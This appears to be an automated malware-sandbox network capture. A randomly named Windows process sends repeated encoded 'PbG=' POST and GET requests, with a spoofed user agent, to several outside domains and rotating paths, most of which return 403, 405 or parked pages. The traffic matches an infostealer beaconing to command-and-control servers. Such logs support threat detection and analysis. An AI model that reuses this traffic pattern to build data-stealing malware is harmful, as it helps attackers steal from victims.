Oct 4, 2024 12:01:11.253637075 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.20 | 49775 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:13.775104046 CEST | 2578 | OUT | POST /w8xy/ HTTP/1.1
Host: www.gipsytroya.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 6424
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.gipsytroya.com
Referer: http://www.gipsytroya.com/w8xy/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG= [TRUNCATED]
Oct 4, 2024 12:01:13.775151968 CEST | 4337 | OUT | Data Ascii: 6+bwUnpoMqN1j4kegk5rt2jGYbc6OaMl+w9WTgUBk0X05VRZNnH2AOfYfpf2aGv76KW5SyWbIPvl2aa4hrnaPfJkZqGvsWIJGvEY1JbPj4jomXdhLwiN0Uw+Hmuuq7f5Eg3AaJKy1R6b746gKY+6dqk2wfd9F9knwTB5XNBK1WyiEEedtpD7Zq56mMqs94CGslCHy04h9PR+4LlNdK7TOwmFls0XzFRUvcoMQOZ0CA8QQG/SWWc
Oct 4, 2024 12:01:13.957463026 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.20 | 49776 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:16.477073908 CEST | 428 | OUT | GET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.gipsytroya.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:01:16.658973932 CEST | 208 | IN | HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.20 | 49777 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:30.005768061 CEST | 681 | OUT | POST /71zx/ HTTP/1.1
Host: www.eagleup.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.eagleup.org
Referer: http://www.eagleup.org/71zx/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaSswM1HGEtfrWdC+oZ9+6M7X0pJqUkbmqk2SrGwQCDFKyDfw502Zh6mR1/GGYRAId/UaakqJUvISKQMypRG//mH8/lwXoT8s+ktHx+IODgrMrP76vuahTJ6A0af/l2EOWZH2tZmZMkV65SlRJSwpbOBJTdUWWnMH86K8BeMaBRak3ZqvcRCFBBLA==
Oct 4, 2024 12:01:30.187117100 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 49778 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:32.708153009 CEST | 701 | OUT | POST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaS+jE1UV8tO7WSH+oZ2e7F7X4pJrRjaVOkzGvGiBCDAKyDUQ5L45hhmRJRGCcRAJ9/UYCkr68gHiKSHSpfbP/mH8/lwX9G8smkq3B+JsnnlsrMrKvuNxTV6A0sf9RMEMuZH3dZlIMjc65QqxI97ZqUJdbXaBuANWogPqQERo11Z3rrufl5AHAaWKpZUCKa3UmG3Pj9RBtmPfQ=
Oct 4, 2024 12:01:32.889719963 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 49779 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:35.410921097 CEST | 1289 | OUT | POST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:01:35.410973072 CEST | 5617 | OUT |
                                                                                                                                                    Data Ascii: rXHio1ZyYl3A7kPTWM7ZSF6gsIv5JpFy+Q719cF8gnJFDS3Yc+0KC+OV2dLXYu6zuXYJGKp2P1JnEbuMGGZMfDzopXCUfwG+WebwxLHrfJQJ6Ai/cStJfTF7H26fTjzBZN+UCTqjvPYO+J6Q4QC1iwgSPosVHcKEFohTpZaQeB+zxzilWpp496hnWr6h41T9K/X7DPIAbL7q9zWs3cK7Zw3G205fMHcZ37BQBHgI9NLc3x/31Ye
Oct 4, 2024 12:01:35.592995882 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 49780 | 91.195.240.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:38.113126040 CEST | 425 | OUT | GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:01:38.294991970 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 49781 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:43.498101950 CEST | 708 | OUT | POST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN7RIx/i6Ev35tSd9SsWWODYmndoVtKr+4PYmrApeNdeqzecssTFOEeaffU41CLzA10A+LmSODWRUHKQ+DbrCdJpNUhEPWnYZsdcb3vR1K7/Wt5aZ7LfVKj50Z3eHy+7DTpUpVsZYBdoHMreL6oFHtDD4UHLEc1stnP5uf8YXPwbaWAKs8X/D/9Q==
Oct 4, 2024 12:01:43.690882921 CEST | 313 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:43 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 49782 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:46.215877056 CEST | 728 | OUT | POST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN6yAx5BiEoX5iZ99S1GWKDYandphHNZa4M8urDtqNeeqzGMstQ1PIeaC8U5JCL3o10FaLnl6AXBUJCw+BG7CdJpNUhEbwnYBsevT3pw1JnPWutKZ7PfUDj50w3fbL+57TpVZVrLwCEYHwl+Kp5E+daDAdGM8Q3ZlOKv/FhqjrzIGkE6VUV9CkgcsMJxtgEIwYxD7IxUQi+VA=
Oct 4, 2024 12:01:46.408291101 CEST | 313 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:46 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49783 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:48.936840057 CEST | 2578 | OUT | POST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG= [TRUNCATED]
Oct 4, 2024 12:01:48.936860085 CEST | 4355 | OUT
                                                                                                                                                    Data Ascii: ch/3pNJFLvcT2/yvu63LfjHH/HXv/15WLQX6kQndrXeWelgTeKkUyQYjkgRVQp6IN/WWP78JM8NseD4Dk/k2D5AvqwW2NSVd2osfBEkBMUfg60oqAqWtEQbcISeMc/MKh3iLvWHqld//wgNWKckWDCRAAYDiC8PlkFBRjpUL1nP9SgbKDxJPNQBCeBHebTFXLUQKDMbCAiuJ1bDJyJyeku3RoHQsfpN0hlbUWZtBqBl2pkN1/4I
Oct 4, 2024 12:01:49.129652023 CEST | 313 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:49 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.11.20 | 49784 | 185.134.245.113 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:51.657408953 CEST | 434 | OUT | GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:01:51.854226112 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:51 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Expires: Fri, 04 Oct 2024 11:01:51 GMT
                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                    Cache-Control: public
                                                                                                                                                    Data Ascii: 1560<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.strategyvanguard.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
Oct 4, 2024 12:01:51.854379892 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { posi
Oct 4, 2024 12:01:51.854397058 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: <br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.strategyvanguard.com') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vr
Oct 4, 2024 12:01:51.854409933 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: } </script> <div class="container"> <h1 id="t"> www.strategyvanguard.com is parked </h1> <p id="m"> www.strategyvanguard.com is registered, but the owner currently does not have an
Oct 4, 2024 12:01:51.854533911 CEST | 587 | IN
                                                                                                                                                    Data Ascii: er"> <span >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 29fd225fdc06aeb618743fcb21e15e73/parkedweb01 </span> </div> <script> q("ls").setAttribute("s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.11.20 | 49785 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:56.964999914 CEST | 699 | OUT | POST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNr5AT/Dq9xBzJXUfb1nmqVcEMtaee76yvtl1HjpI0S3zyiVI1IZPoFLC8oWcORV7fQpdIDUkqXZAyemjY3Ckeh6ceDqw+tvt7lVmqHvPu18cP/RgT9K48v00jI1POpqCzrAYsCkF6pSXoK6GzLAfocwfMGwZjOEgZFqluFr4JGSzUZenUJFpuQ==
Oct 4, 2024 12:01:57.074228048 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:57 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
Oct 4, 2024 12:01:57.074249983 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
Oct 4, 2024 12:01:57.074350119 CEST | 1289 | IN
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
Oct 4, 2024 12:01:57.074362040 CEST | 1289 | IN
Oct 4, 2024 12:01:57.074374914 CEST | 1289 | IN
Oct 4, 2024 12:01:57.074385881 CEST | 1289 | IN
Oct 4, 2024 12:01:57.074397087 CEST | 1289 | IN
Oct 4, 2024 12:01:57.074409008 CEST | 1289 | IN
Oct 4, 2024 12:01:57.074419975 CEST | 1289 | IN
Oct 4, 2024 12:01:57.074558020 CEST | 1189 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.11.20 | 49786 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:01:59.589422941 CEST | 719 | OUT | POST /b2tl/ HTTP/1.1
Host: www.philippatston.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.philippatston.com
Referer: http://www.philippatston.com/b2tl/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:01:59.690645933 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 10:01:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.11.20 | 49787 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:02.214879036 CEST | 1289 | OUT | POST /b2tl/ HTTP/1.1
Host: www.philippatston.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 6424
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.philippatston.com
Referer: http://www.philippatston.com/b2tl/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:02:02.318686008 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 10:02:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    56192.168.11.2049788184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:04.839783907 CEST431OUTGET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:02:04.940937996 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.11.20 | 49789 | 199.192.19.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:10.137639999 CEST | 684 | OUT | POST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm2Ahszs6QNEBwXCWx2kmwJg70uCDS/yQZmPy74zhRRryP5jzOmMJK/ODbiim7Qr/jSNkDnhQ0qnfvzDV3PiGg9wRcXAi84QKNEEeSfk/V95LKq8nzQPR7nWf6FaD8rS8jnIn3gx5PTzWtgEJY/Bp7T+6uEepwV4gH/8cwPShsrGjfgFpuSx/aBQ==
Oct 4, 2024 12:02:10.336822033 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:10 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
